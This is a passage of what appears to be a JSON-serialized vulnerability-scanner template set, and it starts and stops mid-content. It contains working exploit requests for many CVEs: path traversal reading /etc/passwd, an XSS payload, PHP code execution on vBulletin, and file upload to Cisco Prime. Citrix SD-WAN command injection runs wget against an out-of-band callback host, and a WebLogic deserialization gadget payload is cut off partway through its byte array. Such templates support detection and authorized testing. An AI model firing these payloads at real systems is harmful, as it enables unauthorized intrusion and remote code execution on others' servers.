{{interactsh-url}}\")\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-13101","info":{"name":"D-Link DIR-600M - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wan.htm HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/PPPoE/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7275","info":{"name":"Optergy Proton/Enterprise Building Management System - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/updating.jsp?url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2019-3396","info":{"name":"Atlassian Confluence Server - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nReferer: {{Hostname}}\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<param-name>contextConfigLocation</param-name>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14312","info":{"name":"Aptana Jaxer 1.0.3.4547 - Local File inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16123","info":{"name":"PilusCart <=1.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12985","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/ping HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-16759","info":{"name":"vBulletin 5.0.0-5.5.4 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["addcc9f9f2f40e2e6aca3079b73d9d17"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12987","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-11248","info":{"name":"Debug Endpoint pprof - Exposure Detection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/debug/pprof/","{{BaseURL}}/debug/pprof/goroutine?debug=1"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["Types of profiles available:","Profile Descriptions","goroutine profile: total"],"condition":"or"}]}]},{"id":"CVE-2019-1821","info":{"name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /servlet/UploadServlet HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nPrimary-IP: 127.0.0.1\nFilename: test.tar\nFilesize: 10240\nCompressed-Archive: false\nDestination-Dir: tftpRoot\nFilecount: 1\nContent-Length: 269\nContent-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83\n\n--871a4a346a547cf05cb83f57b9ebcb83\nContent-Disposition: form-data; name=\"files\"; filename=\"test.tar\"\n\n../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar  00000000000000{{randstr}}\n--871a4a346a547cf05cb83f57b9ebcb83--\n","GET /test.txt HTTP/1.1\nHost: {{Host}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains((body_2), '{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2019-15889","info":{"name":"WordPress Download Manager <2.9.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19985","info":{"name":"WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name","Email","Status","Created On"],"condition":"and"},{"type":"word","part":"header","words":["Content-Disposition: attachment; filename=all-contacts.csv;"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2725","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\ncmd: id\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"5010\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>9</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>90</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>21</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>117</byte></void><void index=\"201\"><byte>115</byte></void><void index=\"202\"><byte>101</byte></void><void index=\"203\"><byte>83</byte></void><void index=\"204\"><byte>101</byte></void><void index=\"205\"><byte>114</byte></void><void index=\"206\"><byte>118</byte></void><void index=\"207\"><byte>105</byte></void><void index=\"208\"><byte>99</byte></void><void index=\"209\"><byte>101</byte></void><void index=\"210\"><byte>115</byte></void><void index=\"211\"><byte>77</byte></void><void index=\"212\"><byte>101</byte></void><void index=\"213\"><byte>99</byte></void><void index=\"214\"><byte>104</byte></void><void index=\"215\"><byte>97</byte></void><void index=\"216\"><byte>110</byte></void><void index=\"217\"><byte>105</byte></void><void index=\"218\"><byte>115</byte></void><void index=\"219\"><byte>109</byte></void><void index=\"220\"><byte>76</byte></void><void index=\"221\"><byte>0</byte></void><void index=\"222\"><byte>25</byte></void><void index=\"223\"><byte>95</byte></void><void index=\"224\"><byte>97</byte></void><void index=\"225\"><byte>99</byte></void><void index=\"226\"><byte>99</byte></void><void index=\"227\"><byte>101</byte></void><void index=\"228\"><byte>115</byte></void><void index=\"229\"><byte>115</byte></void><void index=\"230\"><byte>69</byte></void><void index=\"231\"><byte>120</byte></void><void index=\"232\"><byte>116</byte></void><void index=\"233\"><byte>101</byte></void><void index=\"234\"><byte>114</byte></void><void index=\"235\"><byte>110</byte></void><void index=\"236\"><byte>97</byte></void><void index=\"237\"><byte>108</byte></void><void index=\"238\"><byte>83</byte></void><void index=\"239\"><byte>116</byte></void><void index=\"240\"><byte>121</byte></void><void index=\"241\"><byte>108</byte></void><void index=\"242\"><byte>101</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>104</byte></void><void index=\"245\"><byte>101</byte></void><void index=\"246\"><byte>101</byte></void><void index=\"247\"><byte>116</byte></void><void index=\"248\"><byte>116</byte></void><void index=\"249\"><byte>0</byte></void><void index=\"250\"><byte>18</byte></void><void index=\"251\"><byte>76</byte></void><void index=\"252\"><byte>106</byte></void><void index=\"253\"><byte>97</byte></void><void index=\"254\"><byte>118</byte></void><void index=\"255\"><byte>97</byte></void><void index=\"256\"><byte>47</byte></void><void index=\"257\"><byte>108</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>110</byte></void><void index=\"260\"><byte>103</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>83</byte></void><void index=\"263\"><byte>116</byte></void><void index=\"264\"><byte>114</byte></void><void index=\"265\"><byte>105</byte></void><void index=\"266\"><byte>110</byte></void><void index=\"267\"><byte>103</byte></void><void index=\"268\"><byte>59</byte></void><void index=\"269\"><byte>76</byte></void><void index=\"270\"><byte>0</byte></void><void index=\"271\"><byte>11</byte></void><void index=\"272\"><byte>95</byte></void><void index=\"273\"><byte>97</byte></void><void index=\"274\"><byte>117</byte></void><void index=\"275\"><byte>120</byte></void><void index=\"276\"><byte>67</byte></void><void index=\"277\"><byte>108</byte></void><void index=\"278\"><byte>97</byte></void><void index=\"279\"><byte>115</byte></void><void index=\"280\"><byte>115</byte></void><void index=\"281\"><byte>101</byte></void><void index=\"282\"><byte>115</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>0</byte></void><void index=\"285\"><byte>59</byte></void><void index=\"286\"><byte>76</byte></void><void index=\"287\"><byte>99</byte></void><void index=\"288\"><byte>111</byte></void><void index=\"289\"><byte>109</byte></void><void index=\"290\"><byte>47</byte></void><void index=\"291\"><byte>115</byte></void><void index=\"292\"><byte>117</byte></void><void index=\"293\"><byte>110</byte></void><void index=\"294\"><byte>47</byte></void><void index=\"295\"><byte>111</byte></void><void index=\"296\"><byte>114</byte></void><void index=\"297\"><byte>103</byte></void><void index=\"298\"><byte>47</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>112</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>99</byte></void><void index=\"303\"><byte>104</byte></void><void index=\"304\"><byte>101</byte></void><void index=\"305\"><byte>47</byte></void><void index=\"306\"><byte>120</byte></void><void index=\"307\"><byte>97</byte></void><void index=\"308\"><byte>108</byte></void><void index=\"309\"><byte>97</byte></void><void index=\"310\"><byte>110</byte></void><void index=\"311\"><byte>47</byte></void><void index=\"312\"><byte>105</byte></void><void index=\"313\"><byte>110</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>101</byte></void><void index=\"316\"><byte>114</byte></void><void index=\"317\"><byte>110</byte></void><void index=\"318\"><byte>97</byte></void><void index=\"319\"><byte>108</byte></void><void index=\"320\"><byte>47</byte></void><void index=\"321\"><byte>120</byte></void><void index=\"322\"><byte>115</byte></void><void index=\"323\"><byte>108</byte></void><void index=\"324\"><byte>116</byte></void><void index=\"325\"><byte>99</byte></void><void index=\"326\"><byte>47</byte></void><void index=\"327\"><byte>114</byte></void><void index=\"328\"><byte>117</byte></void><void index=\"329\"><byte>110</byte></void><void index=\"330\"><byte>116</byte></void><void index=\"331\"><byte>105</byte></void><void index=\"332\"><byte>109</byte></void><void index=\"333\"><byte>101</byte></void><void index=\"334\"><byte>47</byte></void><void index=\"335\"><byte>72</byte></void><void index=\"336\"><byte>97</byte></void><void index=\"337\"><byte>115</byte></void><void index=\"338\"><byte>104</byte></void><void index=\"339\"><byte>116</byte></void><void index=\"340\"><byte>97</byte></void><void index=\"341\"><byte>98</byte></void><void index=\"342\"><byte>108</byte></void><void index=\"343\"><byte>101</byte></void><void index=\"344\"><byte>59</byte></void><void index=\"345\"><byte>91</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>10</byte></void><void index=\"348\"><byte>95</byte></void><void index=\"349\"><byte>98</byte></void><void index=\"350\"><byte>121</byte></void><void index=\"351\"><byte>116</byte></void><void index=\"352\"><byte>101</byte></void><void index=\"353\"><byte>99</byte></void><void index=\"354\"><byte>111</byte></void><void index=\"355\"><byte>100</byte></void><void index=\"356\"><byte>101</byte></void><void index=\"357\"><byte>115</byte></void><void index=\"358\"><byte>116</byte></void><void index=\"359\"><byte>0</byte></void><void index=\"360\"><byte>3</byte></void><void index=\"361\"><byte>91</byte></void><void index=\"362\"><byte>91</byte></void><void index=\"363\"><byte>66</byte></void><void index=\"364\"><byte>91</byte></void><void index=\"365\"><byte>0</byte></void><void index=\"366\"><byte>6</byte></void><void index=\"367\"><byte>95</byte></void><void index=\"368\"><byte>99</byte></void><void index=\"369\"><byte>108</byte></void><void index=\"370\"><byte>97</byte></void><void index=\"371\"><byte>115</byte></void><void index=\"372\"><byte>115</byte></void><void index=\"373\"><byte>116</byte></void><void index=\"374\"><byte>0</byte></void><void index=\"375\"><byte>18</byte></void><void index=\"376\"><byte>91</byte></void><void index=\"377\"><byte>76</byte></void><void index=\"378\"><byte>106</byte></void><void index=\"379\"><byte>97</byte></void><void index=\"380\"><byte>118</byte></void><void index=\"381\"><byte>97</byte></void><void index=\"382\"><byte>47</byte></void><void index=\"383\"><byte>108</byte></void><void index=\"384\"><byte>97</byte></void><void index=\"385\"><byte>110</byte></void><void index=\"386\"><byte>103</byte></void><void index=\"387\"><byte>47</byte></void><void index=\"388\"><byte>67</byte></void><void index=\"389\"><byte>108</byte></void><void index=\"390\"><byte>97</byte></void><void index=\"391\"><byte>115</byte></void><void index=\"392\"><byte>115</byte></void><void index=\"393\"><byte>59</byte></void><void index=\"394\"><byte>76</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>5</byte></void><void index=\"397\"><byte>95</byte></void><void index=\"398\"><byte>110</byte></void><void index=\"399\"><byte>97</byte></void><void index=\"400\"><byte>109</byte></void><void index=\"401\"><byte>101</byte></void><void index=\"402\"><byte>113</byte></void><void index=\"403\"><byte>0</byte></void><void index=\"404\"><byte>126</byte></void><void index=\"405\"><byte>0</byte></void><void index=\"406\"><byte>4</byte></void><void index=\"407\"><byte>76</byte></void><void index=\"408\"><byte>0</byte></void><void index=\"409\"><byte>17</byte></void><void index=\"410\"><byte>95</byte></void><void index=\"411\"><byte>111</byte></void><void index=\"412\"><byte>117</byte></void><void index=\"413\"><byte>116</byte></void><void index=\"414\"><byte>112</byte></void><void index=\"415\"><byte>117</byte></void><void index=\"416\"><byte>116</byte></void><void index=\"417\"><byte>80</byte></void><void index=\"418\"><byte>114</byte></void><void index=\"419\"><byte>111</byte></void><void index=\"420\"><byte>112</byte></void><void index=\"421\"><byte>101</byte></void><void index=\"422\"><byte>114</byte></void><void index=\"423\"><byte>116</byte></void><void index=\"424\"><byte>105</byte></void><void index=\"425\"><byte>101</byte></void><void index=\"426\"><byte>115</byte></void><void index=\"427\"><byte>116</byte></void><void index=\"428\"><byte>0</byte></void><void index=\"429\"><byte>22</byte></void><void index=\"430\"><byte>76</byte></void><void index=\"431\"><byte>106</byte></void><void index=\"432\"><byte>97</byte></void><void index=\"433\"><byte>118</byte></void><void index=\"434\"><byte>97</byte></void><void index=\"435\"><byte>47</byte></void><void index=\"436\"><byte>117</byte></void><void index=\"437\"><byte>116</byte></void><void index=\"438\"><byte>105</byte></void><void index=\"439\"><byte>108</byte></void><void index=\"440\"><byte>47</byte></void><void index=\"441\"><byte>80</byte></void><void index=\"442\"><byte>114</byte></void><void index=\"443\"><byte>111</byte></void><void index=\"444\"><byte>112</byte></void><void index=\"445\"><byte>101</byte></void><void index=\"446\"><byte>114</byte></void><void index=\"447\"><byte>116</byte></void><void index=\"448\"><byte>105</byte></void><void index=\"449\"><byte>101</byte></void><void index=\"450\"><byte>115</byte></void><void index=\"451\"><byte>59</byte></void><void index=\"452\"><byte>120</byte></void><void index=\"453\"><byte>112</byte></void><void index=\"454\"><byte>0</byte></void><void index=\"455\"><byte>0</byte></void><void index=\"456\"><byte>0</byte></void><void index=\"457\"><byte>0</byte></void><void index=\"458\"><byte>-1</byte></void><void index=\"459\"><byte>-1</byte></void><void index=\"460\"><byte>-1</byte></void><void index=\"461\"><byte>-1</byte></void><void index=\"462\"><byte>0</byte></void><void index=\"463\"><byte>116</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>3</byte></void><void index=\"466\"><byte>97</byte></void><void index=\"467\"><byte>108</byte></void><void index=\"468\"><byte>108</byte></void><void index=\"469\"><byte>112</byte></void><void index=\"470\"><byte>117</byte></void><void index=\"471\"><byte>114</byte></void><void index=\"472\"><byte>0</byte></void><void index=\"473\"><byte>3</byte></void><void index=\"474\"><byte>91</byte></void><void index=\"475\"><byte>91</byte></void><void index=\"476\"><byte>66</byte></void><void index=\"477\"><byte>75</byte></void><void index=\"478\"><byte>-3</byte></void><void index=\"479\"><byte>25</byte></void><void index=\"480\"><byte>21</byte></void><void index=\"481\"><byte>103</byte></void><void index=\"482\"><byte>103</byte></void><void index=\"483\"><byte>-37</byte></void><void index=\"484\"><byte>55</byte></void><void index=\"485\"><byte>2</byte></void><void index=\"486\"><byte>0</byte></void><void index=\"487\"><byte>0</byte></void><void index=\"488\"><byte>120</byte></void><void index=\"489\"><byte>112</byte></void><void index=\"490\"><byte>0</byte></void><void index=\"491\"><byte>0</byte></void><void index=\"492\"><byte>0</byte></void><void index=\"493\"><byte>2</byte></void><void index=\"494\"><byte>117</byte></void><void index=\"495\"><byte>114</byte></void><void index=\"496\"><byte>0</byte></void><void index=\"497\"><byte>2</byte></void><void index=\"498\"><byte>91</byte></void><void index=\"499\"><byte>66</byte></void><void index=\"500\"><byte>-84</byte></void><void index=\"501\"><byte>-13</byte></void><void index=\"502\"><byte>23</byte></void><void index=\"503\"><byte>-8</byte></void><void index=\"504\"><byte>6</byte></void><void index=\"505\"><byte>8</byte></void><void index=\"506\"><byte>84</byte></void><void index=\"507\"><byte>-32</byte></void><void index=\"508\"><byte>2</byte></void><void index=\"509\"><byte>0</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>120</byte></void><void index=\"512\"><byte>112</byte></void><void index=\"513\"><byte>0</byte></void><void index=\"514\"><byte>0</byte></void><void index=\"515\"><byte>14</byte></void><void index=\"516\"><byte>29</byte></void><void index=\"517\"><byte>-54</byte></void><void index=\"518\"><byte>-2</byte></void><void index=\"519\"><byte>-70</byte></void><void index=\"520\"><byte>-66</byte></void><void index=\"521\"><byte>0</byte></void><void index=\"522\"><byte>0</byte></void><void index=\"523\"><byte>0</byte></void><void index=\"524\"><byte>50</byte></void><void index=\"525\"><byte>0</byte></void><void index=\"526\"><byte>-70</byte></void><void index=\"527\"><byte>10</byte></void><void index=\"528\"><byte>0</byte></void><void index=\"529\"><byte>3</byte></void><void index=\"530\"><byte>0</byte></void><void index=\"531\"><byte>34</byte></void><void index=\"532\"><byte>7</byte></void><void index=\"533\"><byte>0</byte></void><void index=\"534\"><byte>-72</byte></void><void index=\"535\"><byte>7</byte></void><void index=\"536\"><byte>0</byte></void><void index=\"537\"><byte>37</byte></void><void index=\"538\"><byte>7</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>38</byte></void><void index=\"541\"><byte>1</byte></void><void index=\"542\"><byte>0</byte></void><void index=\"543\"><byte>16</byte></void><void index=\"544\"><byte>115</byte></void><void index=\"545\"><byte>101</byte></void><void index=\"546\"><byte>114</byte></void><void index=\"547\"><byte>105</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>108</byte></void><void index=\"550\"><byte>86</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>114</byte></void><void index=\"553\"><byte>115</byte></void><void index=\"554\"><byte>105</byte></void><void index=\"555\"><byte>111</byte></void><void index=\"556\"><byte>110</byte></void><void index=\"557\"><byte>85</byte></void><void index=\"558\"><byte>73</byte></void><void index=\"559\"><byte>68</byte></void><void index=\"560\"><byte>1</byte></void><void index=\"561\"><byte>0</byte></void><void index=\"562\"><byte>1</byte></void><void index=\"563\"><byte>74</byte></void><void index=\"564\"><byte>1</byte></void><void index=\"565\"><byte>0</byte></void><void index=\"566\"><byte>13</byte></void><void index=\"567\"><byte>67</byte></void><void index=\"568\"><byte>111</byte></void><void index=\"569\"><byte>110</byte></void><void index=\"570\"><byte>115</byte></void><void index=\"571\"><byte>116</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>110</byte></void><void index=\"574\"><byte>116</byte></void><void index=\"575\"><byte>86</byte></void><void index=\"576\"><byte>97</byte></void><void index=\"577\"><byte>108</byte></void><void index=\"578\"><byte>117</byte></void><void index=\"579\"><byte>101</byte></void><void index=\"580\"><byte>5</byte></void><void index=\"581\"><byte>-83</byte></void><void index=\"582\"><byte>32</byte></void><void index=\"583\"><byte>-109</byte></void><void index=\"584\"><byte>-13</byte></void><void index=\"585\"><byte>-111</byte></void><void index=\"586\"><byte>-35</byte></void><void index=\"587\"><byte>-17</byte></void><void index=\"588\"><byte>62</byte></void><void index=\"589\"><byte>1</byte></void><void index=\"590\"><byte>0</byte></void><void index=\"591\"><byte>6</byte></void><void index=\"592\"><byte>60</byte></void><void index=\"593\"><byte>105</byte></void><void index=\"594\"><byte>110</byte></void><void index=\"595\"><byte>105</byte></void><void index=\"596\"><byte>116</byte></void><void index=\"597\"><byte>62</byte></void><void index=\"598\"><byte>1</byte></void><void index=\"599\"><byte>0</byte></void><void 